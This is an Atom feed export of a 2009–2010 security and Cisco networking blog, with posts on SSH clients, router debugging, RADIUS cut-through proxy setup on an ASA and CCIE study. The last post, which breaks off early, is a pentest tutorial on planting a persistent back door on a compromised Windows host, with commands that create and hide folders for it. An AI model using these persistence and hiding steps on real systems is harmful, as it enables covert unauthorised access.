<?xml version='1.0' encoding='UTF-8'?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><feed xmlns='http://www.w3.org/2005/Atom' xmlns:openSearch='http://a9.com/-/spec/opensearchrss/1.0/' xmlns:georss='http://www.georss.org/georss' xmlns:gd='http://schemas.google.com/g/2005' xmlns:thr='http://purl.org/syndication/thread/1.0'><id>tag:blogger.com,1999:blog-522754168935527456</id><updated>2011-09-12T09:16:58.537-04:00</updated><category term='IDS'/><category term='DNS'/><category term='Ettercap'/><category term='CCIE'/><category term='Wyd'/><category term='Hydra'/><category term='Evilgrade'/><category term='Vmware'/><category term='Cisco'/><category term='Nepenthes'/><category term='Security'/><category term='IOS Resiliancy'/><category term='Redundancy'/><category term='Cisco ASA'/><category term='Macof'/><category term='RADIUS'/><category term='WarDialing'/><category term='Honeypot'/><category term='H D Moore'/><category term='Malware Analysis'/><category term='Telesweep'/><category term='Antivirus'/><category term='fgdump'/><category term='Internet Storm Center'/><category term='Ollydbg'/><category term='floating static routes'/><category term='Command Line'/><category term='HSRP'/><category term='Dynamic Arp Inspection'/><category term='Netcat'/><category term='Wireshark'/><category term='Dsniff'/><category term='Metasploit'/><category term='PEiD'/><category term='Port Security'/><category term='Qemu'/><category term='Attack Tools'/><category term='Warvox'/><category term='Man in the Middle'/><category term='Zerowine'/><category term='VLAN hopping'/><category term='Microsoft Windows'/><category term='Ophcrack'/><category term='Verification of IOS'/><category term='Failover'/><category term='Active Directory'/><category term='Snort'/><category term='Arp Spoofing'/><category term='Unpacking Executables'/><category term='CIA'/><category term='John the Ripper'/><category term='Archive Command'/><category term='Windows Server 
2003'/><category term='Yersinia'/><category term='Internet Authentication Service'/><title type='text'>Infosec Samurai</title><subtitle type='html'>A blog about Tech, Hacking and other general musings.</subtitle><link rel='http://schemas.google.com/g/2005#feed' type='application/atom+xml' href='http://infosecsamurai.blogspot.com/feeds/posts/default'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/522754168935527456/posts/default?max-results=100'/><link rel='alternate' type='text/html' href='http://infosecsamurai.blogspot.com/'/><link rel='hub' href='http://pubsubhubbub.appspot.com/'/><author><name>Infosec Samurai</name><uri>http://www.blogger.com/profile/06033560002815227801</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_Uj2UHPRpt08/SoWZoxcjGrI/AAAAAAAAAAM/ItAQyNbVTmo/S220/Dark_Dragon.jpg'/></author><generator version='7.00' uri='http://www.blogger.com'>Blogger</generator><openSearch:totalResults>22</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>100</openSearch:itemsPerPage><entry><id>tag:blogger.com,1999:blog-522754168935527456.post-2777587987809043532</id><published>2010-12-08T17:32:00.000-05:00</published><updated>2010-12-08T17:32:00.676-05:00</updated><title type='text'>Lightning Tip Gnome Connection Manager</title><content type='html'>I typically find that most Cisco admins run Windows or Mac. I am partial to Linux; I love the stability, but I never found anything that could compete with SecureCRT on Windows or Mac computers. I recently found Gnome Connection Manager, which is very comparable to SecureCRT, plus it's free! Gnome Connection Manager supports telnet, ssh, tabs and will automatically enter usernames and passwords. This is a very powerful addition for Cisco admins who run Linux. 
Check out Gnome Connection Manager and give Linux a try; I'm sure you will like it.</content><link rel='replies' type='application/atom+xml' href='http://infosecsamurai.blogspot.com/feeds/2777587987809043532/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=522754168935527456&amp;postID=2777587987809043532' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/522754168935527456/posts/default/2777587987809043532'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/522754168935527456/posts/default/2777587987809043532'/><link rel='alternate' type='text/html' href='http://infosecsamurai.blogspot.com/2010/12/lightning-tip-gnome-connection-manager.html' title='Lightning Tip Gnome Connection Manager'/><author><name>Infosec Samurai</name><uri>http://www.blogger.com/profile/06033560002815227801</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_Uj2UHPRpt08/SoWZoxcjGrI/AAAAAAAAAAM/ItAQyNbVTmo/S220/Dark_Dragon.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-522754168935527456.post-3436519894993282395</id><published>2010-11-29T13:23:00.001-05:00</published><updated>2010-11-29T13:51:42.051-05:00</updated><title type='text'>Lightning TIP Viewing Traffic as it Crosses a Router</title><content type='html'>Do you have a need to see the packets crossing your router? If you do, you can use the &lt;b&gt;debug ip packet detail&lt;/b&gt; command to see this traffic. 
The problem is that it is typically so much traffic that the output is not useful. This is where an access list can help.&lt;br /&gt;&lt;br /&gt;&lt;div style="font-family: &amp;quot;Courier New&amp;quot;,Courier,monospace;"&gt;&lt;span style="font-size: small;"&gt;access-list 101 permit ip host 192.168.0.1 host 192.168.0.2&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: &amp;quot;Courier New&amp;quot;,Courier,monospace;"&gt;&lt;span style="font-size: small;"&gt;access-list 101 permit ip host 192.168.0.2 host 192.168.0.1&lt;/span&gt;&lt;/div&gt;&lt;br /&gt;Now reuse the earlier debug with the access list as a filter.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;,Courier,monospace;"&gt;Router#debug ip packet detail 101&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;If you tweak your logging settings just right, you should be able to capture the packet detail to syslog or to the console in real time, giving you insight into the specific traffic you are looking for. Keep in mind that debug ip packet only shows process-switched packets, so on a CEF- or fast-switched interface transit traffic will not appear unless you disable route caching on that interface, and doing so on a busy production router can push the CPU to its limit.</content><link rel='replies' type='application/atom+xml' href='http://infosecsamurai.blogspot.com/feeds/3436519894993282395/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=522754168935527456&amp;postID=3436519894993282395' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/522754168935527456/posts/default/3436519894993282395'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/522754168935527456/posts/default/3436519894993282395'/><link rel='alternate' type='text/html' href='http://infosecsamurai.blogspot.com/2010/11/lightning-tip-seeing-traffic-crossing.html' title='Lightning TIP Viewing Traffic as it Crosses a Router'/><author><name>Infosec 
Samurai</name><uri>http://www.blogger.com/profile/06033560002815227801</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_Uj2UHPRpt08/SoWZoxcjGrI/AAAAAAAAAAM/ItAQyNbVTmo/S220/Dark_Dragon.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-522754168935527456.post-8817831722312839631</id><published>2010-11-29T12:34:00.001-05:00</published><updated>2010-11-29T12:36:26.473-05:00</updated><title type='text'>Back in Black</title><content type='html'>Hello everyone. I have returned! I will be writing more often about topics in tech that interest me. This blog won't have the specific focus on Information Security or Cisco that it has had in the past. It will be loosely based on Technology, Information Security, Hacking and whatever else I feel like writing about. If you are reading this, thanks for your support.</content><link rel='replies' type='application/atom+xml' href='http://infosecsamurai.blogspot.com/feeds/8817831722312839631/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=522754168935527456&amp;postID=8817831722312839631' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/522754168935527456/posts/default/8817831722312839631'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/522754168935527456/posts/default/8817831722312839631'/><link rel='alternate' type='text/html' href='http://infosecsamurai.blogspot.com/2010/11/back-in-black.html' title='Back in Black'/><author><name>Infosec 
Samurai</name><uri>http://www.blogger.com/profile/06033560002815227801</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_Uj2UHPRpt08/SoWZoxcjGrI/AAAAAAAAAAM/ItAQyNbVTmo/S220/Dark_Dragon.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-522754168935527456.post-4564374251175528265</id><published>2009-07-28T10:17:00.023-04:00</published><updated>2009-07-28T13:51:54.654-04:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Microsoft Windows'/><category scheme='http://www.blogger.com/atom/ns#' term='Windows Server 2003'/><category scheme='http://www.blogger.com/atom/ns#' term='Internet Authentication Service'/><category scheme='http://www.blogger.com/atom/ns#' term='RADIUS'/><category scheme='http://www.blogger.com/atom/ns#' term='Cisco ASA'/><category scheme='http://www.blogger.com/atom/ns#' term='Active Directory'/><title type='text'>Auth Proxy without a Cisco ACS server on an ASA</title><content type='html'>&lt;span style=";font-family:arial;font-size:85%;"  &gt;&lt;span style="font-size:100%;"&gt;Does your organization have &lt;a class="zem_slink" href="http://en.wikipedia.org/wiki/Active_Directory" title="Active Directory" rel="wikipedia"&gt;Active Directory&lt;/a&gt;? Do you have a &lt;a class="zem_slink" href="http://www.cisco.com/" title="Cisco" rel="homepage"&gt;Cisco&lt;/a&gt; router or ASA? You can do authentication proxy (auth-proxy) or cut-through proxy against your Active Directory without having an ACS server. How? I will show you.&lt;br /&gt;&lt;br /&gt;You will need at least one Windows server and a &lt;a class="zem_slink" href="http://en.wikipedia.org/wiki/Cisco_ASA" title="Cisco ASA" rel="wikipedia"&gt;Cisco ASA&lt;/a&gt; or router.&lt;br /&gt;First, we will go to the Windows server. 
This server must be a member of your Active Directory domain and should preferably be &lt;a class="zem_slink" href="http://www.microsoft.com/windowsserver2003/" title="Windows Server 2003" rel="homepage"&gt;Windows Server 2003&lt;/a&gt; or later&lt;/span&gt;.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="font-weight: bold;font-family:arial;font-size:85%;"  &gt;Installing IAS server&lt;/span&gt;&lt;span style=";font-family:arial;font-size:85%;"  &gt;&lt;br /&gt;&lt;/span&gt;&lt;ol  style="font-family:arial;"&gt;&lt;li&gt;&lt;span style="font-size:85%;"&gt;Log in as an Administrator&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size:85%;"&gt;Go to Start &gt; Control Panel &gt; Add or Remove Programs&lt;br /&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size:85%;"&gt;Click Add/Remove Windows Components&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size:85%;"&gt;Scroll through the list and click Networking Services&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size:85%;"&gt;Click Details&lt;br /&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size:85%;"&gt;Check the box next to &lt;a class="zem_slink" href="http://en.wikipedia.org/wiki/Internet_Authentication_Service" title="Internet Authentication Service" rel="wikipedia"&gt;Internet Authentication Service&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size:85%;"&gt;Click OK&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size:85%;"&gt;Then click Next and Finish&lt;br /&gt;&lt;/span&gt;&lt;/li&gt;&lt;/ol&gt;&lt;span style=";font-family:arial;font-size:85%;"  &gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_IYfuPD9qO24/Sm8MeNLXnTI/AAAAAAAAAIc/PC-a7giOe_g/s1600-h/IAS.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 246px;" src="http://1.bp.blogspot.com/_IYfuPD9qO24/Sm8MeNLXnTI/AAAAAAAAAIc/PC-a7giOe_g/s320/IAS.jpg" alt="" 
id="BLOGGER_PHOTO_ID_5363519394294504754" border="0" /&gt; &lt;/a&gt;The system may ask you to insert your Windows Server 2003 CD, so have it handy. To verify that it is installed, go to Start &gt; Administrative Tools &gt; Internet Authentication Service.&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="font-weight: bold;font-family:arial;font-size:85%;"  &gt;Configuring IAS for AD&lt;/span&gt;&lt;span style=";font-family:arial;font-size:85%;"  &gt;&lt;br /&gt;&lt;br /&gt;Now we want to configure our IAS server to allow RADIUS authentication of the Active Directory group we are going to create. To do this we need to complete the following steps.&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;ol  style="font-family:arial;"&gt;&lt;li&gt;&lt;span style="font-size:85%;"&gt;Go to Start &gt; Administrative Tools &gt; Internet Authentication Service&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size:85%;"&gt;Right-click Internet Authentication Service in the top left of the window&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size:85%;"&gt;Choose Register Server In Active Directory&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size:85%;"&gt;Choose OK on the first message, which allows the server to read the dial-in permission of users from AD&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size:85%;"&gt;Choose OK on the message that follows.&lt;/span&gt;&lt;/li&gt;&lt;/ol&gt;&lt;span style=";font-family:arial;font-size:85%;"  &gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_IYfuPD9qO24/Sm8SHswUFxI/AAAAAAAAAIk/Tj3Dlx1Q_wU/s1600-h/registerIAS.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 258px;" src="http://4.bp.blogspot.com/_IYfuPD9qO24/Sm8SHswUFxI/AAAAAAAAAIk/Tj3Dlx1Q_wU/s320/registerIAS.jpg" alt="" id="BLOGGER_PHOTO_ID_5363525604703737618" border="0" 
/&gt;&lt;/a&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="font-weight: bold;font-family:arial;font-size:85%;"  &gt;Add your device to the IAS Server&lt;/span&gt;&lt;span style=";font-family:arial;font-size:85%;"  &gt;&lt;br /&gt;&lt;br /&gt;We now want to add the router/ASA to the IAS server as a RADIUS client. To add it we do the following.&lt;br /&gt;&lt;/span&gt;&lt;ol  style="font-family:arial;"&gt;&lt;li&gt;&lt;span style="font-size:85%;"&gt;Right-click on the RADIUS Clients folder&lt;br /&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size:85%;"&gt;Choose New RADIUS Client&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size:85%;"&gt;Enter the Friendly Name and the IP address or FQDN, then click Next&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size:85%;"&gt;Leave the default &lt;a class="zem_slink" href="http://en.wikipedia.org/wiki/RADIUS" title="RADIUS" rel="wikipedia"&gt;RADIUS&lt;/a&gt; Standard in Client-Vendor, enter the Shared Secret, confirm it and choose Finish&lt;/span&gt;&lt;/li&gt;&lt;/ol&gt;&lt;span style=";font-family:arial;font-size:85%;"  &gt;You should now see the device in the right pane of the window. Pick a long, random shared secret, since the user password in each RADIUS request is hidden only by this secret.&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_IYfuPD9qO24/Sm8VFztzC3I/AAAAAAAAAIs/Qb1Xl_LAW9M/s1600-h/AddRADIUS.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 258px;" src="http://4.bp.blogspot.com/_IYfuPD9qO24/Sm8VFztzC3I/AAAAAAAAAIs/Qb1Xl_LAW9M/s320/AddRADIUS.jpg" alt="" id="BLOGGER_PHOTO_ID_5363528870747376498" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="font-weight: bold;font-family:arial;font-size:85%;"  &gt;Edit your Remote Access Policy&lt;/span&gt;&lt;span style=";font-family:arial;font-size:85%;"  &gt;&lt;br /&gt;We now want to add a Remote Access Policy that will give our group permission to authenticate to our devices. 
To do this we add a remote access policy.&lt;br /&gt;&lt;/span&gt;&lt;ol  style="font-family:arial;"&gt;&lt;li&gt;&lt;span style="font-size:85%;"&gt;In the Internet Authentication Service window, click Remote Access Policies in the left pane.&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size:85%;"&gt;In the right pane, right-click the default policy, and select Delete.&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size:85%;"&gt;Right-click on Remote Access Policies&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size:85%;"&gt;Choose New Remote Access Policy&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size:85%;"&gt;Choose Next&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size:85%;"&gt;Click Set Up A Custom Policy and name it Cisco-Auth&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size:85%;"&gt;In the Policy Conditions section, add your Windows group from Active Directory&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size:85%;"&gt;Choose Next&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size:85%;"&gt;Choose Grant Remote Access Permission&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size:85%;"&gt;Choose the Edit Profile button&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size:85%;"&gt;Choose the Authentication tab, uncheck all options, then check Unencrypted Authentication (PAP, SPAP), which is what the ASA and router use for this&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size:85%;"&gt;Click the Advanced tab&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size:85%;"&gt;Remove the Framed-Protocol RADIUS Standard entry (value PPP)&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size:85%;"&gt;Choose the Service-Type RADIUS Standard entry (value Framed) and click Edit&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size:85%;"&gt;Change the attribute value to Login and click OK&lt;br /&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size:85%;"&gt;Click Add, click Vendor-Specific, click Add, choose Cisco, then Yes it Conforms 
and Configure Attribute&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size:85%;"&gt;Add the string &lt;/span&gt;&lt;span style="font-weight: bold;font-size:85%;" &gt;shell:priv-lvl=15&lt;/span&gt;&lt;span style="font-size:85%;"&gt;, or change the number to whatever privilege level you want your users to have.&lt;br /&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size:85%;"&gt;Click OK through the remaining dialogs and close.&lt;/span&gt;&lt;/li&gt;&lt;/ol&gt;&lt;span style=";font-family:arial;font-size:85%;"  &gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_IYfuPD9qO24/Sm8tadxs-RI/AAAAAAAAAI8/u69kCL40_CE/s1600-h/Policy.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 270px;" src="http://3.bp.blogspot.com/_IYfuPD9qO24/Sm8tadxs-RI/AAAAAAAAAI8/u69kCL40_CE/s320/Policy.jpg" alt="" id="BLOGGER_PHOTO_ID_5363555613914495250" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;AAA RADIUS Authentication setup&lt;/span&gt;&lt;br /&gt;OK, that's enough Windows, so let's get going on our ASA with the following commands (1812 is the RADIUS authentication port and 1813 the accounting port, matching what IAS listens on):&lt;br /&gt;&lt;/span&gt;&lt;ol  style="font-weight: bold;font-family:arial;"&gt;&lt;li&gt;&lt;span style="font-size:85%;"&gt;ASA(config)#aaa-server RADIUS protocol radius&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size:85%;"&gt;ASA(config)#aaa-server RADIUS (inside) host &lt;span style="font-style: italic;"&gt;IPofyourhost yoursharedsecret&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size:85%;"&gt;ASA(config-aaa-server-host)#authentication-port 1812&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size:85%;"&gt;ASA(config-aaa-server-host)#accounting-port 1813&lt;/span&gt;&lt;/li&gt;&lt;/ol&gt;&lt;span style=";font-family:arial;font-size:85%;"  &gt;Then you want to test your AAA setup:&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;ASA#test aaa-server 
authentication RADIUS username yourusername password yourpassword&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;It will then ask you for a host IP; if everything is set up correctly you will get&lt;span style="font-weight: bold;"&gt;&lt;br /&gt;&lt;span style="font-family:courier new;"&gt;INFO: Authentication Successful&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=";font-family:arial;font-size:85%;"  &gt;&lt;span style="font-weight: bold;"&gt;Setup Cut Through Proxy&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;First we create an ACL to define what traffic we want to be authenticated. Note that the entries must be &lt;b&gt;tcp&lt;/b&gt;, not ip, because a port match (eq 80, eq 443) is only valid for a transport protocol.&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;&lt;br /&gt;ASA(config)#access-list cut-through permit tcp 10.0.0.0 255.0.0.0 any eq 80&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;ASA(config)#access-list cut-through permit tcp 10.0.0.0 255.0.0.0 any eq 443&lt;/span&gt;&lt;br /&gt;&lt;span style="font-size:85%;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="font-weight: bold;font-size:85%;" &gt;Then we configure the authentication&lt;/span&gt;&lt;span style="font-size:85%;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="font-weight: bold;"&gt;ASA(config)#aaa authentication match cut-through inside RADIUS&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;So that's it! We just saved our company some money by not needing a Cisco ACS for auth-proxy/cut-through proxy. We still don't get the advanced features of ACS, but we do get a free authentication server. 
If you want to do the same thing on a router, use something like this. Auth-proxy hands the intercepted HTTP login to the default login method and to the router's HTTP server, so both aaa authentication login and ip http authentication aaa must be present as well.&lt;br /&gt;&lt;/span&gt;&lt;span style=";font-family:arial;font-size:85%;"  &gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;aaa new-model&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;radius-server host 10.0.0.1 auth-port 1812 acct-port 1813 key &lt;span style="font-style: italic;"&gt;yoursharedsecret&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;aaa authentication login default group radius&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;aaa authorization auth-proxy default group radius&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;ip http server&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;ip http authentication aaa&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;ip auth-proxy name security http inactivity-time 60&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;interface f0/0&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;ip auth-proxy security&lt;/span&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=";font-family:arial;font-size:85%;"  &gt;&lt;br /&gt;You can use the RADIUS server we just created for login authentication as well, but &lt;span style="font-weight: bold;"&gt;make sure you are using a crypto IOS image and SSH&lt;/span&gt;; otherwise you expose your Windows domain passwords in clear text over Telnet, which undermines the protection the Windows domain already gives them.&lt;/span&gt;&lt;span style="font-size:85%;"&gt;&lt;br /&gt;&lt;/span&gt;</content><link rel='replies' type='application/atom+xml' 
href='http://infosecsamurai.blogspot.com/feeds/4564374251175528265/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=522754168935527456&amp;postID=4564374251175528265' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/522754168935527456/posts/default/4564374251175528265'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/522754168935527456/posts/default/4564374251175528265'/><link rel='alternate' type='text/html' href='http://infosecsamurai.blogspot.com/2009/07/auth-proxy-without-cisco-acs-server-on.html' title='Auth Proxy without a Cisco ACS server on an ASA'/><author><name>Infosec Samurai</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_IYfuPD9qO24/SV0aRW1WgqI/AAAAAAAAAGg/fxf-015j9qo/S220/Dark_Dragon.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/_IYfuPD9qO24/Sm8MeNLXnTI/AAAAAAAAAIc/PC-a7giOe_g/s72-c/IAS.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-522754168935527456.post-2211614989374926441</id><published>2009-07-23T14:54:00.009-04:00</published><updated>2009-07-23T15:44:33.017-04:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Security'/><category scheme='http://www.blogger.com/atom/ns#' term='CCIE'/><title type='text'>CCIE Security July 23rd 2009</title><content type='html'>&lt;p&gt;Alright, I am adopting the mantra &lt;b&gt;“It doesn’t matter how slow you go, it only matters if you stop.”&lt;/b&gt; I have been banging on the &lt;a href="http://www.cisco.com/web/learning/le3/ccie/security/index.html"&gt;CCIE&lt;/a&gt;&lt;a href="http://www.cisco.com/web/learning/le3/ccie/security/index.html"&gt; Security&lt;/a&gt; since the beginning of the year, and I am starting to get to a 
point where I feel there isn’t a ton of study material available. The material I have from IPEXPERT is first rate, but I am beginning to think I picked a really bad time to start studying for a CCIE in Security. I haven’t been exposed to this kind of lull in material after a blueprint change in any other type of certification I have pursued.&lt;/p&gt; &lt;p&gt;I have, on the other hand, done some of the new labs from &lt;a href="http://www.ipexpert.com/"&gt;IPExpert&lt;/a&gt;; they are of much better quality than the previous ones. I have been working on LAB1A all this week and I think I learned quite a few things about the ASA, especially MPF. It’s really cool that you can change HTTP headers for web servers using MPF. You can make your Server header say anything you want, like the following.&lt;/p&gt; &lt;p&gt;policy-map type inspect http MAP_HTTP&lt;br /&gt;parameters&lt;br /&gt;spoof-server "This Server runs on Caffeine!"&lt;/p&gt; &lt;p&gt;I know that if I keep going on my path to CCIE I will get there! I am sure in a few more months more study materials will appear, but it just seems like they are extremely sparse right now. I guess the number of Security CCIEs is so low that it might be hard to get study material written. 
The R&amp;amp;S CCIE won't be like this, I am sure.&lt;br /&gt;&lt;/p&gt;</content><link rel='replies' type='application/atom+xml' href='http://infosecsamurai.blogspot.com/feeds/2211614989374926441/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=522754168935527456&amp;postID=2211614989374926441' title='2 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/522754168935527456/posts/default/2211614989374926441'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/522754168935527456/posts/default/2211614989374926441'/><link rel='alternate' type='text/html' href='http://infosecsamurai.blogspot.com/2009/07/ccie-security-july-23rd-2009.html' title='CCIE Security July 23rd 2009'/><author><name>Infosec Samurai</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_IYfuPD9qO24/SV0aRW1WgqI/AAAAAAAAAGg/fxf-015j9qo/S220/Dark_Dragon.jpg'/></author><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-522754168935527456.post-8385414902131393349</id><published>2009-03-13T08:51:00.006-04:00</published><updated>2009-03-13T14:26:11.018-04:00</updated><title type='text'>Attack Script Part 1</title><content type='html'>First off, let me say that I am going to start posting shorter blogs more frequently. 
I guess I have been kind of inspired by Twitter. Instead of one giant post every month I am going to try to post several smaller posts. I am also going to be using this blog as a sounding board for my upcoming CCIE Security Lab studies. I am going to write down what I encounter and see if anything strikes any readers out there on the net.&lt;br /&gt;&lt;br /&gt;We are going to create a back door that we can use over Windows file sharing. It will allow you to run any command and have its output exported into a file. This is an add-on to Ed Skoudis's for loop that allows this to happen.&lt;br /&gt;&lt;br /&gt;So let's say we have popped a shell out of a Windows box. OK, pentest is over, right? Wrong! We need to use this box as a pivot point to try to go deeper into the network. So what can we do to keep access to this system without introducing any new software into the system?&lt;br /&gt;&lt;br /&gt;We start with creating a couple of folders. We want to create these folders in a somewhat inconspicuous location. I usually choose C:\windows\system. So the commands to do this are&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;mkdir C:\windows\system\input&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;mkdir C:\windows\system\output&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Next we want to hide the two folders. We want to make these folders hidden and system folders. That requires them to unhide both hidden files and protected operating system files to see the folders. To do this we use the following commands.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;attrib C:\windows\system\input +H +S&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;attrib C:\windows\system\output +H +S&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Now we want to share the two folders&lt;span style="font-weight: bold;"&gt;. 
